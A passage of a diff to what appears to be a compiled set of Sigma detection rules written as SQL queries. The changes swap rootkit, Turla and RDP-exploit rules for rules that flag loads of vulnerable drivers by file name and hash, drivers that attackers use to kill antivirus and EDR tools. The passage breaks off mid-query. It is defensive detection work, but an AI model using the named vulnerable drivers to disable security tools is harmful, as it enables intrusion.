+ "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", - "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "title": "Process Hacker and 
System Informer Driver Load", + "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "status": "experimental", + "description": "Detects the load of drivers used by Process Hacker and System Informer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate user of process hacker or system informer by low level developers or system administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138')))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_process_hacker.yml" }, { - "title": "Potential RDP Exploit CVE-2019-0708", - "id": "aaa5b30d-f418-420b-83a0-299cb6024885", - "status": "test", - "description": "Detect suspicious error on protocol RDP, 
potential CVE-2019-0708", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "status": "experimental", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Bad connections or network interruptions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR 
Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE '%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE '%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE '%MD5=68dde686d6999ad2e5d182b20403240b%' ESCAPE '\\' OR Hashes LIKE '%MD5=a785b3bc4309d2eb111911c1b55e793f%' ESCAPE '\\' OR Hashes LIKE '%MD5=6ab7b8ef0c44e7d2d5909fdb58d37fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9ce18960c23f38706ae9c6584d9ac90%' ESCAPE '\\' OR Hashes LIKE '%MD5=ab53d07f18a9697139ddc825b466f696%' ESCAPE '\\' OR Hashes LIKE '%MD5=ba5f0f6347780c2ed911bbf888e75bef%' ESCAPE '\\' OR Hashes LIKE '%MD5=13ee349c15ee5d6cf640b3d0111ffc0e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a237fa07ce3ed06ea924a9bed4a6b99%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa222bed731713904320723b9c085b11%' ESCAPE '\\' OR Hashes LIKE '%MD5=0898af0888d8f7a9544ef56e5e16354e%' ESCAPE '\\' OR Hashes LIKE '%MD5=e076dadf37dd43a6b36aeed957abee9e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f27c09cc8680e06b04d6a9c34ca1e08%' ESCAPE '\\' OR Hashes LIKE '%MD5=1b32c54b95121ab1683c7b83b2db4b96%' ESCAPE '\\' OR Hashes LIKE '%MD5=715572dfe6fb10b16f980bfa242f3fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a06bcd96ef0b90a1753a805b4235f28%' ESCAPE '\\' OR Hashes LIKE '%MD5=f242cffd9926c0ccf94af3bf16b6e527%' ESCAPE '\\' OR Hashes LIKE '%MD5=7ed6030f14e66e743241f2c1fa783e69%' ESCAPE '\\' OR Hashes LIKE '%MD5=0d6fef14f8e1ce5753424bd22c46b1ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=a4fda97f452b8f8705695a729f5969f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=62c18d61ed324088f963510bae43b831%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5a642329cce4df94b8dc1ba9660ae34%' ESCAPE '\\' OR Hashes LIKE '%MD5=a641e3dccba765a10718c9cb0da7879e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed07f1a8038596574184e09211dfc30f%' ESCAPE '\\' OR Hashes LIKE '%MD5=3473faea65fba5d4fbe54c0898a3c044%' ESCAPE '\\' OR Hashes LIKE '%MD5=708ac9f7b12b6ca4553fd8d0c7299296%' ESCAPE '\\' OR Hashes LIKE '%MD5=bbe4f5f8b0c0f32f384a83ae31f49a00%' ESCAPE '\\' OR Hashes LIKE '%MD5=257483d5d8b268d0d679956c7acdf02d%' ESCAPE '\\' OR Hashes LIKE 
